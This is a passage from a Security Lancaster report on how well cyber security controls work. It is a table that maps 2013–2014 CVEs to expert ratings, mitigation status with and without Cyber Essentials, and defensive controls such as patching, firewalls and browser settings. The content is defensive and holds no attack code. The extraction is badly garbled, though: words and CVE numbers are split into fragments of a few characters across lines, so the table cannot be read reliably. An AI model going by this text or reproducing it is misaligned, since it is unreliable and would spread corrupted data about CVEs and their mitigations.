ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
